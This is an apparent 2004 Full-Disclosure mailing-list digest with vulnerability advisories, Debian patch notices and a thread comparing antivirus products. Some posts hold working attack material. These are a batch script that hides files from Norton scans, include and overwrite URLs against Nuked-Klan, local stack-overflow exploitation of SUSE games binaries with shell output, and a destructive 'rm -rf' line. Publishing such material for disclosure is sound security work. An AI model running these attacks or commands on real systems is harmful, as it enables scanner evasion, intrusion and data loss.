Re[2]: [inbox] Re: [Full-Disclosure] Hi! Antiviruses Comparison - A Little Research Results

2004-04-17 Thread 3APA3A 
Dear Curt Purdy,

--Friday, April 16, 2004, 10:39:14 PM, you wrote to [EMAIL PROTECTED]:


CP> Been following this thread and I can bite my tongue no longer.  As a
CP> long-time user of the first AV in the world, F-Secure, then F-Prot in '88, I
CP> have found it to be the only AV that could detect and remove every virus I
CP> have ever come upon, including multiple instances where fully updated Norton
CP> and McAfee either did not detect or could not remove them.

CP> They were the first AV with signature auto-updating over 4 years ago. And it
CP> does not update once a week or once a day, but continually checks on an
CP> hourly basis for new sigs.  It has three seperate scan engines, so it's like
CP> having a layered defense in one product.  And it operates at the lowest
CP> level of any AV I am aware of, running at the base level of I/O, actually
CP> grabbing it off the disk before any other process can touch it, making it
CP> extremely fast and efficient with no noticble impact in performance, even on
CP> slow boxes.  My $.02

CP> Curt Purdy CISSP, GSEC, MCSE+I, CNE, CCDA
CP> Information Security Engineer
CP> DP Solutions

Do  you  remember  Nimda  worm?  It  was  probably first worm to exploit
Outlook Express vulnerability to launch itself automatically. On Windows
NT  4.0  F-Secure  engine  (well, it was few years ago, I don't remember
version) had a problem - it catch this worm _after_ it was executed. And
worm  successfully  spreads  from  protected  machine approx. in ~50% of
cases...



-- 
~/ZARAZA
Áđîńüňĺ ńňŕđŕňüń˙ - íč÷ĺăî čç ýňîăî íĺ âűéäĺň. (Ňâĺí)

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Network Intelligence Advisory - Denial of Service Vulnerability in ColdFusion MX

2004-04-17 Thread K. K. Mookhey 
Name: Denial of Service Vulnerability in ColdFusion MX
Systems Affected: Version 6.0 and earlier
Severity: Medium-High
Category: Denial of Service
Vendor URL: Macromedia ColdFusion MX
Discovered by: Network Intelligence (I) Pvt. Ltd. (www.nii.co.in)
Online location: http://www.nii.co.in/vuln/cfdos.html

Description

ColdFusion MX is the solution for building and deploying powerful web
applications and web services. Using the proven tag-based scripting and
built-in services in ColdFusion MX, web application developers can easily
harness the power of the Java platform without the complexity. Available for
stand-alone installation or for deployment on industry-leading J2EE
application servers, ColdFusion enables over 10,000 customers and hundreds
of thousands of developers worldwide to deliver powerful web applications in
record time.

Vulnerability Details
==
When the ColdFusion MX Server attempts to write an error message with an
oversized string as part of the error message, the server's memory usage
shoots up and stays there until the server completes writing the error
message. This message is written on to a web page, as well as into
ColdFusion's Application.log file. If this error is induced repeatedly, the
entire memory on the server is used up and a Java out-of-memory condition
occurs. We tested this by inducing the error ten times in a row.

Impact
=
When the memory usage goes high, genuine requests can no longer be handled.
Attempts to stop and restart the ColdFusion server using the Windows
Service's applet or the cfstop.bat script fail. During our tests, the only
way to get out of the attack was to restart the server.

Exploitation

To exploit this vulnerability, the attacker would need to induce an error in
the processing of the CFM pages. This could be done either by supplying a
long string (we needed about 2-3 MB) of data as a GET or POST request to a
function that does not
handle that data type or the length. For instance, this error was induced by
supplying the string to the DateFormat() function, which formats the
supplied string into a date value of the specified format. Ten such requests
will cause the ColdFusion server to completely hang and require a manual
reboot. Another method of inducing this error is for someone to upload a
malicious CFM page, which contains code such as :

**Start of code**


#the_date#
**End of code**

This is a feasible scenario for a web-hosting company that provides shared
hosting services to multiple clients. A malicious user of the service may
try to disable
the web-hosting company's servers by uploading this page, and accessing it a
dozen times from his browser.

Vendor Response:
=
The vendor had assigned CFMX bug #51267 to it, and has patched this bug in
the current latest release of this software: ColdFusion MX Server 6.1. This
is available as a free upgrade to existing users. In the new version, the
length of the error string is limited to 256 bytes.

Workaround
=
In case upgrading the server is not feasible immediately, you could create
your own error reporting template and set this in the ColdFusion
Administrator "Settings" page as the "Site-wide Error Handler" - the memory
consumption is moderate. You must ensure that the customized error page does
not contain the string that causes the error.

Disclaimer
===
The information contained in this advisory is copyright (c) 2004 Network
Intelligence India Pvt. Ltd. (www.nii.co.in) This advisory may be
redistributed, provided
that no fee is assigned and that the advisory is not modified in any way.

About us
===
Network Intelligence is an security consulting firm specializing in
vulnerability research, application security audits, penetration testing,
intrusion detection & analysis, BS7799 consulting, and overall information
assurance
services. More information about our list of security services is at
http://www.nii.co.in/services.html We also have our range of security
auditing products for Windows, Oracle and SQL Server. More information on
these products is available at http://www.nii.co.in/products.html


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] [SCSA-028] Nuked-Klan Multiple Vulnerabilities

2004-04-17 Thread advisory 
=
Security Corporation Security Advisory [SCSA-028]

Nuked-Klan Multiple Vulnerabilities
= 

PROGRAM: Nuked-KlaN
HOMEPAGE: http://www.nuked-klan.org
VULNERABLE VERSIONS: b1.4, b1.5, SP2
RISK: MEDIUM/HIGH
IMPACT: Config File Destruction
Local Files Include
Globals Vars Overwriting

RELEASE DATE: 2004-04-16


=
TABLE OF CONTENTS
=

1..DESCRIPTION
2..DETAILS
3.EXPLOITS
4SOLUTIONS
5...WORKAROUND
6..DISCLOSURE TIMELINE
7..CREDITS
8...DISCLAIMER
9...REFERENCES
10FEEDBACK


1. DESCRIPTION
=

Nuked-Klan is a complete CMS with a few intersting modules.

More information is available at http://www.nuked-klan.org


2. DETAILS
=


In the file index.php, we can see the include of nuked.php :
--
include ("nuked.php");
--
In nuked.php are the lines :
---
[...]
include ("conf.inc.php");
[...]
if ($user_langue == ""){$language=$nuked[langue];}
else {$language=$user_langue;}

include ("lang/$language");
[...]
---
A file "lang/$language" is thus included.
This variable can be modified by anyone, with the variable named $user_langue.
Anyone can this include a file from the HD in Nuked-Klan b1.5 and less.


In this version b1.5 are a few other holes.
In the file globals.php are the lines :
---
[...]
nk_globals('HTTP_GET_VARS');
nk_globals('HTTP_POST_VARS');
nk_globals('HTTP_COOKIE_VARS');
nk_globals('HTTP_SERVER_VARS');
[...]
---
The nk_globals() function can be found in nuked.php :
---
function nk_globals($table) {
if (is_array($GLOBALS[$table])) {
reset($GLOBALS[$table]);
while (list($key, $val) = each($GLOBALS[$table])) {
$GLOBALS[$key] = $val;
}
}
}
---
This function will create globals variables. Their names and values are in the 
table $table (here GET, POST, COOKIE and SERVER tables).
When these lines are executed in globals.php, the GET, POST and COOKIE vars 
become GLOBALS vars.
But if these GLOBALS vars already exists, they are overwrited.

So if the file globals.php is included after the config vars (in conf.inc.php), 
then anyone can give new values to these vars.
It is possible in index.php :
---
[...]
if($page!=""){$im_file="$page";}else{$im_file="index";}
}

if (is_file("modules/$file/$im_file.php") ){
include("modules/$file/$im_file.php");
}else{
include("modules/404/index.php");
}
[...]
---
which could include globals.php with the URL :
http://[target]/index.php?file=..&page=globals
Or :
http://[target]/index.php?user_langue=../globals.php
This last url allow to overwrites GLOBALS[] in every modules, like Suggest 
(modules/Suggest/index.php) :
---

[...]
function add_sug($data)
{
global $user, $module, $nuked;

opentable();

include("modules/Suggest/modules/$module.php");
$date=time();
$content=make_array($data);
$sql=mysql_query("INSERT INTO $nuked[prefix]"._suggest." VALUES 
('','$module','$user[0]','$content','$date')");
echo"

"._YOURSUGGEST."
"._THXPART."

";
redirect("index.php?file=$module",2);

closetable();
}
[...]
---

Here we can change $nuked[prefix] and then insert what we want in the database.



The last problem in b1.5 is the file update.php :
---

';


$fp = fopen('conf.inc.php', w);
if (!$fp) die (sprintf('Erreur File Open','conf.inc.php','conf.inc.php'));
fwrite($fp, $content);
fclose($fp);
[...]
}

[...]

switch ($action)
{
[...]
case"edit_config":
edit_config($_GET['op']);
break;

case"update_config":
update_config($_POST);
break;

case"install":
install();
break;
[...]
}

?>
---

This file can include a local file too with $langue and the update_confi() 
function can overwrite the config file.



3. EXPLOITS
=

RE: Re[2]: [inbox] Re: [Full-Disclosure] Hi! Antiviruses Comparison - A Little Research Results

2004-04-17 Thread Curt Purdy 
3APA3A wrote:
> Do  you  remember  Nimda  worm?  It  was  probably first worm
> to exploit
> Outlook Express vulnerability to launch itself automatically.
> On Windows
> NT  4.0  F-Secure  engine  (well, it was few years ago, I
> don't remember
> version) had a problem - it catch this worm _after_ it was
> executed. And
> worm  successfully  spreads  from  protected  machine approx.
> in ~50% of
> cases...

Yes, remember Nimda quite well, we made a lot of money over a couple of
weeks cleaning up operations using Norton Enterprise.  However, we had
around 80 boxes in the DMZ with full Internet public ip's protected with
F-Secure and none got it.

Curt Purdy CISSP, GSEC, MCSE+I, CNE, CCDA
Information Security Engineer
DP Solutions



If you spend more on coffee than on IT security, you will be hacked.
What's more, you deserve to be hacked.
-- White House cybersecurity adviser Richard Clarke

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Internet Explorer XSS published unpatched in SP1 AND SP2

2004-04-17 Thread Rafel Ivgi, The-Insider 
Hi!

2 weeks ago i discovered this XSS:
s
in Internet Explorer(fully patched and with SP2)
I also discoverd they Liu Die Yu(greetings pal) discovered it a long time 
ago.

More details at:
http://www.securiteam.com/windowsntfocus/6J006156AS.html

This means it was not patched, even in SP2.
This vulnerability does not effect outlook express.
Rafel Ivgi, The-Insider. 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Norton AntiVirus nested file manual scan bypass.....

2004-04-17 Thread bipin gautam 
Norton AntiVirus nested file manual scan bypass.

Product Version: Norton Antivirus 2002 (~Only tested
On...~)
Risk Impact: Medium

Summary:

If you manage to inject a file in the
sub-directory(s); beyond windows OS can create
normally, [ say in 130 'th + sub-directory at
c:\..\..\..\upto 130'th ... ] NAV fails to scan
the NESTED FILE. Indeed, it's more a windows
restriction in accesing the nested file than a
ANTIVIRUS flaw. Other antivirus product should also
suffer the same. *.PLEASE VERIFY.* NAV

=---CUT--=
@echo off
rem Bipin Gautam [hUNT3R]
rem [http://www.geocities.com/visitbipin] *
[http://www.01security.com]
echo »
echo 
echo -( For  a  harmless   test...  you   canuse,
echo http://www.eicar.org/anti_virus_test_file.htm )-
echo 
pause
cd\
c:
cd\
:hUNT3r 
md 1 
cd 1 
if not errorlevel  1 goto :hUNT3r
cd..
rmdir 1
md X
cls
echo
***
echo  Now you can inject any file inside the folder
'X' which is inside 
echo 120'th sub-directory of 'c:\1' [ i.e
c:\1\..\...\.[120'th dir].\X\ ] 
echo Note: The file you are moving to'c:\1\...\X\'
should only contain 
echo '1' char. file name, say: '1.exe' or '2.exe' or
'a.exe' etc... 
echo not as '123.not' 'qwert.hak'
echo .
echo   So, ARE YOU DONE!?
echo . 
echo   After  this  batch   script  is  terminated, 
you'll
echo   find the file you ^just copied^ inside
c:\1\\X\ 
echo   now in c:\3\3\3\3\3\1\1\1\..[130' th
dir].\X\
echo   mmm... Then have a  manual scan of c:\3\ Any
file you
echo   have put inside the dir. 'X' can't be detected
by NORTON Antivirus anymore!!!
echo
***

pause
cd\
md 3\3\3\3\3\3\3\3\3\3\
cd\
xcopy /E /I c:\1\*.* c:3\3\3\3\3\3\3\3\3\3\
exit

=---CUT--=

Disclaimer: The information in the advisory is
believed to be accurate at the time of printing based
on currently available information. Use of the
information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this
information. Neither the author nor the publisher
accepts any liability for any direct, indirect or
consequential loss or damage arising from use of, or
reliance on this information.




__
Do you Yahoo!?
Yahoo! Tax Center - File online by April 15th
http://taxes.yahoo.com/filing.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Suse 9.0 Multiple gid = 20(games) vulnz

2004-04-17 Thread narko tix 
   - S3CTI0N 0x01 -
 
-Bug : Suse 9.0 /usr/games/mille l0c4l l4m3 st4ck 0v3rfl0w.(Wh3n s4vin9 th3 g4m3).
   Pr0gr4m  suid3d t0 games wi7h d3f4ul7.   

-3xpl0i747i0n : 0x01-) m4nu4l-)  112 byt3s fil3n4m3 is 3n0ugh for m4nu4lly 
3xpl0i747i0n.
 us3 y0ur ASCII r3t 4ddr3ss for fil3n4m3.

0x02-) 3xpl0i7-) Us3 Sh3llc0d3 which unfilt3rs '\x0b' ,'\n', 
'\x90','\220' ch4r4ct3rs.
XOR them.'c4us3 mill3 c0nv3rts th4t shi77y ch4r4ct4rs to '~P'. 
3sp3ci4lly 0x90 4nd \220.
Us3 y0ur 0wn sh3llc0d3 in th3 4tt4ch3d c0d3.
-D3m0ns7r4ti0n:

[EMAIL PROTECTED]:~/c-hell$ ./env
RET =  þÿ¿

[EMAIL PROTECTED]:~/c-hell$ /usr/games/mille
--HAND----DECK--|      -
P 89|Hand Total 0 0
1 75--DISCARD-- |   -  -
2 Go| Overall Total 0 0 
3 Gasoline  |  Games0 0
4 Repairs   file:  þÿ¿ þÿ¿ þÿ¿ þ|  
ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þ| p: pickq: quit
ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þ| u: use #   o: order hand
ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þ| d: discard #   s: save  
ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þ| w: toggle window   r: reprint
ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þ|  
ÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ sh-2.05b$ uid=1001(addicted) gid=20(games) 
groups=100(users)



   - S3CTI0N 0x02 -   

-Bug : Suse 9.0 /usr/games/monop l0c4l l4m3 st4ck 0v3rfl0w.7hiz iz 4n 0ld but g4m3 iz 
s7ill vuln3r4bl3.
   0v3rfl0w in 1. pl4y3rn4m3.(4ls0 th3 0th3rs)
   Pr0gr4m suid3d games by d3f4ul7
-3xpl0i747i0n : 0x01-) m4nu4l-) 304 byt3s pl4y3rn4m3 is 3n0ugh f0r 3xpl0i747i0n.
   Us3 y0ur ASCII r3t 4ddr3ss.

0x02-) 3xpl0i7-) Us3 sh3llc0d3 which is n0t c0nt4ins s0m3 ch4rs like 
'\x0b'. XOR them.
   3xpl0i7 4tt4ch3d.
-D3m0nstr4ti0n:
[EMAIL PROTECTED]:~/c-hell$ ./env
RET =  þÿ¿   
[EMAIL PROTECTED]:~/c-hell$ /usr/games/monop
How many players? 1
Player 1's name:  þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ 
þÿ¿ þÿ¿
þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ 
þÿ¿ þÿ¿ þÿ¿
þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ 
þÿ¿ þÿ¿ þÿ¿
þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ 
þÿ¿ þÿ¿ þÿ¿
þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ 
þÿ¿ þÿ¿ þÿ¿
þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ 
þÿ¿ þÿ¿ þÿ¿
þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿ þÿ¿
sh-2.05b$ id
uid=1001(addicted) gid=20(games) groups=100(users)
sh-2.05b$ 

- S3C7I0N 0x03 -
C0nclusi0n: Th3r3 4r3 t00 m4ny bin4ri3s s7ill vuln3r4bl3 t0 7his kind 0f bugz.Bu7 I'm 
t00 B0R3D.
Quick P4tch : rm -rf /usr/games/*
---


N4rK07IX

-- 
__
Check out the latest SMS services @ http://www.linuxmail.org 
This allows you to send and receive SMS through your mailbox.


Powered by Outblaze


mille.c
Description: Binary data


monopexp.c
Description: Binary data

[Full-Disclosure] [SECURITY] [DSA 489-1] New Linux 2.4.17 packages fix local root exploit (mips+mipsel)

2004-04-17 Thread debian-security-announce 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 489-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
April 17th, 2004http://www.debian.org/security/faq
- --

Package: kernel-source-2.4.17 kernel-patch-2.4.17-mips
Vulnerability  : several vulnerabilities
Problem-Type   : local
Debian-specific: no
CVE ID : CAN-2004-0003 CAN-2004-0010 CAN-2004-0109 CAN-2004-0177 CAN-2004-0178

Several serious problems have been discovered in the Linux kernel.
This update takes care of Linux 2.4.17 for the PowerPC/apus and S/390
architectures.  The Common Vulnerabilities and Exposures project
identifies the following problems that will be fixed with this update:

CAN-2004-0003

A vulnerability has been discovered in the R128 drive in the Linux
kernel which could potentially lead an attacker to gain
unauthorised privileges.  Alan Cox and Thomas Biege developed a
correction for this

CAN-2004-0010

Arjan van de Ven discovered a stack-based buffer overflow in the
ncp_lookup function for ncpfs in the Linux kernel, which could
lead an attacker to gain unauthorised privileges.  Petr Vandrovec
developed a correction for this.

CAN-2004-0109

zen-parse discovered a buffer overflow vulnerability in the
ISO9660 filesystem component of Linux kernel which could be abused
by an attacker to gain unauthorised root access.  Sebastian
Krahmer and Ernie Petrides developed a correction for this.

CAN-2004-0177

Solar Designer discovered an information leak in the ext3 code of
Linux.  In a worst case an attacker could read sensitive data such
as cryptographic keys which would otherwise never hit disk media.
Theodore Ts'o developed a correction for this.

CAN-2004-0178

Andreas Kies discovered a denial of service condition in the Sound
Blaster driver in Linux.  He also developed a correction for this.

These problems are also fixed by upstream in Linux 2.4.26 and future
versions of 2.6.

The following security matrix explains which kernel versions for which
architectures are already fixed and which will be removed instead.

Architecture   stable (woody)unstable (sid) remove in sid
source 2.4.17-1woody32.4.25-3   2.4.19-11
mips   2.4.17-0.020226.2.woody6  fixed soon 2.4.19-0.020911.8
mipsel 2.4.17-0.020226.2.woody6  2.4.25-0.040415.1  2.4.19-0.020911.9

We recommend that you upgrade your kernel packages immediately, either
with a Debian provided kernel or with a self compiled one.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 

  Source archives:


http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody3.dsc
  Size/MD5 checksum:  690 222d67d058984eef34ef3af56ad82720

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody3.diff.gz
  Size/MD5 checksum:41918 dce13eeca598d548e390a72fed76728f

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17.orig.tar.gz
  Size/MD5 checksum: 29445154 d5de2a4dc49e32c37e557ef856d5d132


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody6.dsc
  Size/MD5 checksum:  805 2076a7b98736825eb39bf5bc8eba23d2

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody6.tar.gz

  Architecture independent components:


http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-doc-2.4.17_2.4.17-1woody3_all.deb
  Size/MD5 checksum:  1720294 3b6e8a510996bebd066d1cda8bac41eb

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody3_all.deb
  Size/MD5 checksum: 23880582 542792a28d1fc90844f9b51abe84f90e


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody6_all.deb
  Size/MD5 checksum:  1149360 9e6755113b2f9aa136cb7a661ff17953

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-headers-2.4.17_2.4.17-0.020226.2.woody6_

[Full-Disclosure] [SECURITY] [DSA 490-1] New Zope packages fix arbitrary code execution

2004-04-17 Thread debian-security-announce 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 490-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
April 17th, 2004http://www.debian.org/security/faq
- --

Package: zope
Vulnerability  : arbitrary code execution
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2002-0688

A vulnerability has been discovered in the index support of the
ZCatalog plug-in in Zope, an open source web application server.  A
flaw in the security settings of ZCatalog allows anonymous users to
call arbitrary methods of catalog indexes.  The vulnerability also
allows untrusted code to do the same.

For the stable distribution (woody) this problem has been fixed in
version 2.5.1-1woody1.

For the unstable distribution (sid) this problem has been fixed in
version 2.6.0-0.1 and higher.

We recommend that you upgrade your zope package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 

  Source archives:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1.dsc
  Size/MD5 checksum:  684 bae9669b048bb73ff0fb4de1cba378d4
http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1.diff.gz
  Size/MD5 checksum:88172 d8461358bc98af430ed32dd89a45dbcb
http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1.orig.tar.gz
  Size/MD5 checksum:  2165141 65d502b2acf986693576decad6b837cf

  Alpha architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_alpha.deb
  Size/MD5 checksum:  2236994 a0eb7df5046ae357d760d18ef8a2619e

  ARM architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_arm.deb
  Size/MD5 checksum:  2148088 dba70d7c78d850557783603038bc9947

  Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_i386.deb
  Size/MD5 checksum:  2130316 5172bd775bcd0ae107242525cf67b443

  Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_ia64.deb
  Size/MD5 checksum:  2388054 51c1ad0503162c4f0e152f233a45b3ca

  HP Precision architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_hppa.deb
  Size/MD5 checksum:  2240312 bbac2d795c157069d27e63ffaf0f3b5c

  Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_m68k.deb
  Size/MD5 checksum:  2133690 1662a0ece415a56d4e25ad6f31576b9f

  Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_mips.deb
  Size/MD5 checksum:  2172370 5f127d8ac54046e75c6ab9bbfe9224c1

  Little endian MIPS architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_mipsel.deb
  Size/MD5 checksum:  2170856 f57b6a66116df5b30f499f5e4cdab6aa

  PowerPC architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_powerpc.deb
  Size/MD5 checksum:  2168352 2b66d671fe1cb86a84df066902c503d0

  IBM S/390 architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_s390.deb
  Size/MD5 checksum:  2153234 97df94cbfc71001ce67d6f02e6dde798

  Sun Sparc architecture:

http://security.debian.org/pool/updates/main/z/zope/zope_2.5.1-1woody1_sparc.deb
  Size/MD5 checksum:  2212970 5a660d1befe3b8ba2be26439eb1d1b21


  These files will probably be moved into the stable distribution on
  its next update.

- -
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show ' and http://packages.debian.org/

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFAgVBNW5ql+IAeqTIRAnVYAJ9ciliJJ/IMptXuXfIbKODbhLE4rQCbBxXs
n9NTb0/x1L86sF7AskHHS+Q=
=xkMT
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] [SECURITY] [DSA 491-1] New Linux 2.4.19 packages fix local root exploit (mips)

2004-04-17 Thread debian-security-announce 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 491-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
April 17th, 2004http://www.debian.org/security/faq
- --

Package: kernel-source-2.4.19 kernel-patch-2.4.19-mips
Vulnerability  : several vulnerabilities
Problem-Type   : local
Debian-specific: no
CVE ID : CAN-2004-0003 CAN-2004-0010 CAN-2004-0109 CAN-2004-0177 CAN-2004-0178

Several serious problems have been discovered in the Linux kernel.
This update takes care of Linux 2.4.17 for the MIPS architecture.  The
Common Vulnerabilities and Exposures project identifies the following
problems that will be fixed with this update:

CAN-2004-0003

A vulnerability has been discovered in the R128 drive in the Linux
kernel which could potentially lead an attacker to gain
unauthorised privileges.  Alan Cox and Thomas Biege developed a
correction for this

CAN-2004-0010

Arjan van de Ven discovered a stack-based buffer overflow in the
ncp_lookup function for ncpfs in the Linux kernel, which could
lead an attacker to gain unauthorised privileges.  Petr Vandrovec
developed a correction for this.

CAN-2004-0109

zen-parse discovered a buffer overflow vulnerability in the
ISO9660 filesystem component of Linux kernel which could be abused
by an attacker to gain unauthorised root access.  Sebastian
Krahmer and Ernie Petrides developed a correction for this.

CAN-2004-0177

Solar Designer discovered an information leak in the ext3 code of
Linux.  In a worst case an attacker could read sensitive data such
as cryptographic keys which would otherwise never hit disk media.
Theodore Ts'o developed a correction for this.

CAN-2004-0178

Andreas Kies discovered a denial of service condition in the Sound
Blaster driver in Linux.  He also developed a correction for this.

These problems are also fixed by upstream in Linux 2.4.26 and future
versions of 2.6.

The following security matrix explains which kernel versions for which
architectures are already fixed and which will be removed instead.

Architecture   stable (woody)unstable (sid) remove in sid
source 2.4.19-4.woody2   2.4.25-3   2.4.19-11
mips   2.4.19-0.020911.1.woody4  2.4.25-0.040415.1  2.4.19-0.020911.8
h
We recommend that you upgrade your kernel packages immediately, either
with a Debian provided kernel or with a self compiled one.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 

  Source archives:


http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody2.dsc
  Size/MD5 checksum:  672 9860f430fe435100c103a42c7b5dbc66

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody2.diff.gz
  Size/MD5 checksum:47625 cc802c42472c637de501dde07df7cec8

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19.orig.tar.gz
  Size/MD5 checksum: 32000211 237896fbb45ae652cc9c5cecc9b746da


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody4.dsc
  Size/MD5 checksum:  792 a21174ff774b45160cf3f714ea1ec226

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody4.tar.gz
  Size/MD5 checksum:  1032076 96e1ae069ef39afbdae505edc6f11375

  Architecture independent components:


http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-doc-2.4.19_2.4.19-4.woody2_all.deb
  Size/MD5 checksum:  1783144 deaa1a0705f5f334ebbc60734b6bc2c7

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody2_all.deb
  Size/MD5 checksum: 25895130 f42c8c0b27e644d024e33738a5c87863


